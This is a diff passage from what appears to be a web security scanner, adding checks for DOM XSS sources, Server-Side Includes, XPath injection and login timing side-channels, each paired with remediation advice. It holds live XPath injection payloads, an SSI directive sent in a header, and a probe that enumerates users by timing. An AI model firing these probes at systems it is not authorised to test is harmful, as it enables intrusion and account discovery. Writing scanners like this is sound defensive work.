+      addFinding('MEDIUM', 'Stored/DOM XSS', 'postMessage listener detected (DOM XSS via messaging)', 'Page has message event listener - test for origin validation bypass', 'Ensure postMessage handler validates event.origin before processing event.data. Never assign untrusted data to innerHTML via postMessage.');
+    }
+
+    const urlHashPattern = /location\.(?:hash|search)\s*(?:=|(?:\+|concat|includes|split|substring))/g;
+    if (urlHashPattern.test(body)) {
+      addFinding('MEDIUM', 'Stored/DOM XSS', 'URL hash/search used in JavaScript (DOM XSS source)', 'URL fragment/search processed in client code', 'Sanitize URL hash/search before using in DOM manipulation. Avoid assigning location.hash to innerHTML.');
+    }
+  } catch {}
+}
+
+export async function scanSsiRemote(origin, spinner) {
+  spinner.text = 'Testing Server-Side Includes (SSI)...';
+  const ssiPaths = ['/index.shtml', '/test.shtml', '/index.stm', '/includes/header.shtml'];
+
+  for (const path of ssiPaths) {
+    try {
+      const resp = await fetchText(`${origin}${path}`, { headers: { 'User-Agent': '<!--#echo var="DATE_LOCAL" -->' } }, 5000);
+
+      if (resp.status === 200 && resp.body.length > 0) {
+        if (/<!--#|Server Side Include|SSI/i.test(resp.body) || resp.body.includes('DATE_LOCAL')) {
+          addFinding('MEDIUM', 'XPath / SSI', `SSI endpoint found: ${path}`, `Potential Server-Side Includes at ${origin}${path}`, 'Disable SSI if not needed. If needed, never pass user input to SSI directives.');
+        }
+      }
+    } catch {}
+  }
+}
+
+export async function scanXpathRemote(origin, spinner) {
+  spinner.text = 'Testing XPath injection...';
+
+  const xpathPayloads = [
+    { name: 'Auth bypass', payload: "' or '1'='1", param: 'username' },
+    { name: 'XPath OR injection', payload: "' or 1=1 or 'a'='a", param: 'user' },
+    { name: 'String extraction', payload: "' and string-length(//user[name/text()='admin']/password/text())=4 and '1'='1", param: 'id' },
+  ];
+
+  for (const { name, payload, param } of xpathPayloads) {
+    try {
+      const resp = await fetchText(`${origin}/api/login`, {
+        method: 'POST',
+        headers: { 'Content-Type': 'application/xml' },
+        body: `<login><username>${payload}</username><password>test</password></login>`,
+      }, 5000);
+
+      if (resp.status === 200) {
+        addFinding('CRITICAL', 'XPath / SSI', `XPath injection via ${param}: ${name}`, `Payload: ${payload} returned success`, 'Use parameterized XPath queries. Sanitize input against XPath special characters. Consider using JSON/NoSQL instead of XML.');
+        break;
+      }
+    } catch {}
+  }
+}
+
+export async function scanTimingRemote(origin, spinner) {
+  spinner.text = 'Timing side-channel probe...';
+
+  const validUser = 'admin@target.com';
+  const invalidUser = `nonexistent${Date.now()}@random.com`;
+
+  try {
+    const startValid = Date.now();
+    await fetchText(`${origin}/api/login`, {
+      method: 'POST',
+      headers: { 'Content-Type': 'application/json' },
+      body: JSON.stringify({ email: validUser, password: 'wrong' }),
+    }, 8000);
+    const validTime = Date.now() - startValid;
+
+    const startInvalid = Date.now();
+    await fetchText(`${origin}/api/login`, {
+      method: 'POST',
+      headers: { 'Content-Type': 'application/json' },
+      body: JSON.stringify({ email: invalidUser, password: 'wrong' }),
+    }, 8000);
+    const invalidTime = Date.now() - startInvalid;
+
+    if (Math.abs(validTime - invalidTime) > 200) {
+      addFinding('HIGH', 'Timing Side-Channel', `Timing difference detected: ${Math.abs(validTime - invalidTime)}ms`, `Valid user took ${validTime}ms, invalid took ${invalidTime}ms (difference: ${Math.abs(validTime - invalidTime)}ms)`, 'Use constant-time comparison. Ensure login endpoint responds identically for existing and non-existing users. Add random jitter.');
+    } else {
+      addFinding('INFO', 'Timing Side-Channel', 'Login timing appears consistent', `Valid: ${validTime}ms, Invalid: ${invalidTime}ms (diff: ${Math.abs(validTime - invalidTime)}ms)`, 'Good practice. Continue monitoring for timing differences in other endpoints.');
+    }
+  } catch {}
+}
+
+function btoa(str) {
+  return Buffer.from(str).toString('base64').replace(/=+$/, '').replace(/\+/g, '-').replace(/\//g, '_');
+}